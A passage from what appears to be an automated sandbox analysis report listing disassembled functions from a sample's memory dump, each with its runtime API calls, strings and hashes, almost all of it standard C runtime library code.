Function 004F163C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 004F18B5

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 5af1250c676d2b44cf6c32d761d3c95ad064f4810daa73284a345cf439f376c0
Instruction ID: f8f5b68912b3288fe74cdca78ca83d29748ab86f33b84f0207f90ba3be2741bb
Opcode Fuzzy Hash: 5af1250c676d2b44cf6c32d761d3c95ad064f4810daa73284a345cf439f376c0
Instruction Fuzzy Hash: 0AB11574A0028DDFDB05DF9AC890BBEBBB1AF45304F14415AE604973A2C7799941CFA9

Function 004F98B9 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00C80758,00C80758,?,7FFFFFFF,?,004F9B89,00C80758,00C80758,?,00C80758,?,?,?,?,00C80758,?), ref: 004F995F
__alloca_probe_16.LIBCMT ref: 004F9A1A
__alloca_probe_16.LIBCMT ref: 004F9AA9
__freea.LIBCMT ref: 004F9AF4
__freea.LIBCMT ref: 004F9AFA
__freea.LIBCMT ref: 004F9B30
__freea.LIBCMT ref: 004F9B36
__freea.LIBCMT ref: 004F9B46

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: a64fe09f2dfc051ecaf30fac5fad59e8b1ae438b4fd4c8c6f46d536178ce68c9
Instruction ID: 756841415eec0d5058485422d34051a238782dcf96fc8e8cc7d7611eb65d9246
Opcode Fuzzy Hash: a64fe09f2dfc051ecaf30fac5fad59e8b1ae438b4fd4c8c6f46d536178ce68c9
Instruction Fuzzy Hash: 7D71E3B290024DABDF209E559C82FBF77A9AF85314F19005FEB04A7381D67DAD00C769

Function 004E429A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004E42E3
__alloca_probe_16.LIBCMT ref: 004E430F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004E434E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E436B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004E43AA
__alloca_probe_16.LIBCMT ref: 004E43C7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E4409
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004E442C

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: fba72fc941c3667ec2b04123ecab45f70d3c8b1d1c2a3e4090c39ffd26134259
Instruction ID: f5f22d3b2ac273843c74405ada194099c60da439b39704e72a1f04b4030edb1e
Opcode Fuzzy Hash: fba72fc941c3667ec2b04123ecab45f70d3c8b1d1c2a3e4090c39ffd26134259
Instruction Fuzzy Hash: 8F51D272A00286AFDB204F56CC44FBF3BB9EF84756F15412AFD05A6290D7389C11CB58

Function 004E7680 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004E76B7
___except_validate_context_record.LIBVCRUNTIME ref: 004E76BF
_ValidateLocalCookies.LIBCMT ref: 004E7748
__IsNonwritableInCurrentImage.LIBCMT ref: 004E7773
_ValidateLocalCookies.LIBCMT ref: 004E77C8

Strings

csm, xrefs: 004E775D

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c4b39095a846d377fef6d951ca1cec72f9fcd1c1444bd6eb6d76d9fb20812b7d
Instruction ID: 4800dcb07d73f846b6d6b6c4fb28c8f3f6d32bfa86cca182d78ba062165b09a4
Opcode Fuzzy Hash: c4b39095a846d377fef6d951ca1cec72f9fcd1c1444bd6eb6d76d9fb20812b7d
Instruction Fuzzy Hash: C441D634A042489FCF00DF6BC880A9E7BB1BF45329F14809AE8189B352D739AD15CB99

Function 004E787A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004E7871,004E5E40,004E4F12), ref: 004E7888
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E7896
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E78AF
SetLastError.KERNEL32(00000000,004E7871,004E5E40,004E4F12), ref: 004E7901

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 507e8bc12de7241a553b8e5e00a10f766b96d03329c3661417ccaef94470548f
Instruction ID: baad0478f9c2ef9fcc655336c6e7cd49ce562aa1c5d50eff1ccf956303822269
Opcode Fuzzy Hash: 507e8bc12de7241a553b8e5e00a10f766b96d03329c3661417ccaef94470548f
Instruction Fuzzy Hash: E101F53220C7555EAA142777BC9A52F2655FF2237BB30033FF424412E1EF194C16A24C

Function 004EC13F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F4A61D19,?,?,00000000,004FB0F9,000000FF,?,004EC0CF,?,?,004EC0A3,00000000), ref: 004EC174
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004EC186
FreeLibrary.KERNEL32(00000000,?,00000000,004FB0F9,000000FF,?,004EC0CF,?,?,004EC0A3,00000000), ref: 004EC1A8

Strings

CorExitProcess, xrefs: 004EC17E
mscoree.dll, xrefs: 004EC16D

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 90474d36727801713bc4ec47e2ae1718a43e62fea5eb71335a8d4c1abd78a73a
Instruction ID: c158811130faf17fdc41c8d25402b44d7eb1e3d9fbf6b55792468aebc6aa646a
Opcode Fuzzy Hash: 90474d36727801713bc4ec47e2ae1718a43e62fea5eb71335a8d4c1abd78a73a
Instruction Fuzzy Hash: 6C01A231944699AFDB118F51DC45FBFBBB9FF04B15F000136E811E22A4DB789801CA98

Function 004E3BCF Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E3BD6
std::_Lockit::_Lockit.LIBCPMT ref: 004E3BE1
std::_Lockit::~_Lockit.LIBCPMT ref: 004E3C4F

Part of subcall function 004E3D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004E3D4A

std::locale::_Setgloballocale.LIBCPMT ref: 004E3BFC
_Yarn.LIBCPMT ref: 004E3C12

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 5393334074cb18d81b7110cf03cd23bc638d1dc18bc4ad03d49a68ecf6887304
Instruction ID: e7bcc774ee37cf54aaf6409ea5143736626d4b054f0ac866b12c9f15b2053da9
Opcode Fuzzy Hash: 5393334074cb18d81b7110cf03cd23bc638d1dc18bc4ad03d49a68ecf6887304
Instruction Fuzzy Hash: 30018871A002909BC706AF22D85993D7B72BF85746B14004EE80257392CB3CAB02DA8D

Function 004F0A0E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0BA6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0BB9

Strings

O, xrefs: 004F0AAF
O, xrefs: 004F0A8D

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: O$O
API String ID: 885266447-1025494177
Opcode ID: 590f6f82cdf1b63d470e6ba81f5f586fa95c9ab180396cc642801064ebc6650f
Instruction ID: 43f23910f05d850c1b60cb471cae1bf840b13ac93322b1a783c6bbaf7df855ac
Opcode Fuzzy Hash: 590f6f82cdf1b63d470e6ba81f5f586fa95c9ab180396cc642801064ebc6650f
Instruction Fuzzy Hash: 0F518271E0024DAFCF14CF98C891EBEBBB2EB89314F14805AEA5597352D334AE41CB54

Function 004E2391 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E2398
std::_Lockit::_Lockit.LIBCPMT ref: 004E23A5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004E23E2

Part of subcall function 004E3CCD: _Yarn.LIBCPMT ref: 004E3CEC
Part of subcall function 004E3CCD: _Yarn.LIBCPMT ref: 004E3D10

Strings

bad locale name, xrefs: 004E23F3

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: 516884d7eb9b3ddb2764e786b7068f8b54e4665bea25c96ec4c9934b18b13d88
Instruction ID: 8ce3cc43709beb8ce5cbcefab06e0bab20a345be35d1c1939f5b78aff30f3ff3
Opcode Fuzzy Hash: 516884d7eb9b3ddb2764e786b7068f8b54e4665bea25c96ec4c9934b18b13d88
Instruction Fuzzy Hash: 9F01ADB14007849EC7209F6B844044BFFE4BF29311750892FE18987B02C778A600CB9D

Function 004E89C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00504FF0,00000000,00000800,?,004E8973,00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue), ref: 004E89CF
GetLastError.KERNEL32(?,004E8973,00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue,00000000,?,004E792D), ref: 004E89D9
LoadLibraryExW.KERNEL32(00504FF0,00000000,00000000,?,00504FF0,?,?,?,004E16D9,?,004E16D9,?), ref: 004E8A01

Strings

api-ms-, xrefs: 004E89E6

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 54d35c998149cd73943cad78a605be36db31bf23a1b6e0c319d9f0c9c6769b3d
Instruction ID: 03fd85a506bbb946f43a3231fc3a1a7b9ec62ccdd3985f7d736f305c3c2ae208
Opcode Fuzzy Hash: 54d35c998149cd73943cad78a605be36db31bf23a1b6e0c319d9f0c9c6769b3d
Instruction Fuzzy Hash: 2AE0B834640288BFEF202B62DD06B693E569F10B55F544036FA0CE81E1EF65D961D58D

Function 004EFB8E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F4A61D19,00000000,00000000,00000000), ref: 004EFBF1

Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004EFE4C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004EFE94
GetLastError.KERNEL32 ref: 004EFF37

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 6dc41918ec164c580fd539d78a02bb88d48213b3aa4c8054b13c784f82e14d47
Instruction ID: eaf9cfed4d8837e8b3ab6d5d58e42607f72c9e132bc8eb86a2c88be3b503de02
Opcode Fuzzy Hash: 6dc41918ec164c580fd539d78a02bb88d48213b3aa4c8054b13c784f82e14d47
Instruction Fuzzy Hash: D2D17A75D002889FCF15CFA9D8809EEBBB5FF09305F28412AE815EB352D734A94ACB54

Function 004E7991 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004E7A58
___AdjustPointer.LIBCMT ref: 004E7A7B
___AdjustPointer.LIBCMT ref: 004E7B17

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3c8047494e52de9f7080a831b4815265c0db8d5ef36844bde10ed603a1c8e1b2
Instruction ID: 04ea8d7c0ea4293464038ca219eaf396d588cadbe48e38d9504ef881097a31e9
Opcode Fuzzy Hash: 3c8047494e52de9f7080a831b4815265c0db8d5ef36844bde10ed603a1c8e1b2
Instruction Fuzzy Hash: 61510471608682AFDB288F57D841B7F77A0FF40326F14446FE90147291E738AD81C798

Function 004F4010 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0

GetLastError.KERNEL32 ref: 004F4074
__dosmaperr.LIBCMT ref: 004F407B
GetLastError.KERNEL32(?,?,?,?), ref: 004F40B5
__dosmaperr.LIBCMT ref: 004F40BC

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 2ba76d05bed5c13c482d8f82f34f0bc8119cb5b35a34574fc24c47d84ec66e02
Instruction ID: 8d2ca3bee09998a4fb7326275f633948f6038073cffa0e413c2060efa8435c16
Opcode Fuzzy Hash: 2ba76d05bed5c13c482d8f82f34f0bc8119cb5b35a34574fc24c47d84ec66e02
Instruction Fuzzy Hash: 4121CB3160021DAFDB20AF66884193BB7ADEF80369700852FFB2597251DF39EC518B99

Function 004EB369 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b66be9a7195db70a6d1b7dd68144820fca5678f65d2f36c84be637df288f90b
Instruction ID: 914be33d6597ce4a517c898bc12afbbc0cb37c646ee91efb53b846ecb35d68f0
Opcode Fuzzy Hash: 7b66be9a7195db70a6d1b7dd68144820fca5678f65d2f36c84be637df288f90b
Instruction Fuzzy Hash: D121DB31600285AFDB20AFA3DC8197B77ADEF4435A710451BF964D7292D738EC1097D4

Function 004F4FA6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004F4FAE

Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004F4FE6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004F5006

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: e159bbae8bb1628cc52c4120cae1e481b04d26d5a49db3d708e60e6d53207812
Instruction ID: 5e67187e5d88a1466bd811c9b631ae57826167fd3343f3e8a72e40459302e984
Opcode Fuzzy Hash: e159bbae8bb1628cc52c4120cae1e481b04d26d5a49db3d708e60e6d53207812
Instruction Fuzzy Hash: 0E1104B190161E7FA6212BB35C8AC7F6DACDE8839A710042AF70191101EE6DDE1181BD

Function 004F93D5 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000), ref: 004F93EC
GetLastError.KERNEL32(?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000,00000000,?,004F0512,00000000), ref: 004F93F8

Part of subcall function 004F93BE: CloseHandle.KERNEL32(FFFFFFFE,004F9408,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000,00000000), ref: 004F93CE

___initconout.LIBCMT ref: 004F9408

Part of subcall function 004F9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004F93AF,004F81BE,00000000,?,004EFF8B,00000000,00000000,00000000,00000000), ref: 004F9393

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000), ref: 004F941D

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b9b9c3ef5c52fe0e15857cab96ffbec82864f2c8f33737a685ab64d8d9cba10a
Instruction ID: d7414af18fc3e646f14055554a090e62fea6866c3c2e98e207bd3c08a2844add
Opcode Fuzzy Hash: b9b9c3ef5c52fe0e15857cab96ffbec82864f2c8f33737a685ab64d8d9cba10a
Instruction Fuzzy Hash: 06F0AC36901258BBCF221FA5DC05AAA3F66FB593A1F044125FB1895260C6328D61EB98

Function 004F57A2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON

Download Yara Rule

Strings

P0U, xrefs: 004F5AB5
P0U, xrefs: 004F57D0

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID: P0U$P0U
API String ID: 0-3449549966
Opcode ID: ca9aad07fad035ab716a8a0133d65e776106eeaf4b6faaa8fa7cc036d9b91919
Instruction ID: e101b1bd8ea445f20ea84009f98feb9fd137b4fa75a11d1365a22dda7d64c8d8
Opcode Fuzzy Hash: ca9aad07fad035ab716a8a0133d65e776106eeaf4b6faaa8fa7cc036d9b91919
Instruction Fuzzy Hash: 0AC16572D40209AFDB20DBA9CD82FFEB7F89F04744F144156FB04EB282D5B599418B64

Function 004F63EE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EED98: HeapFree.KERNEL32(00000000,00000000,?,004F5DEB,?,00000000,?,?,004F608C,?,00000007,?,?,004F6585,?,?), ref: 004EEDAE
Part of subcall function 004EED98: GetLastError.KERNEL32(?,?,004F5DEB,?,00000000,?,?,004F608C,?,00000007,?,?,004F6585,?,?), ref: 004EEDB9

___free_lconv_mon.LIBCMT ref: 004F6432

Strings

x1U, xrefs: 004F64DA
P0U, xrefs: 004F6404

Memory Dump Source

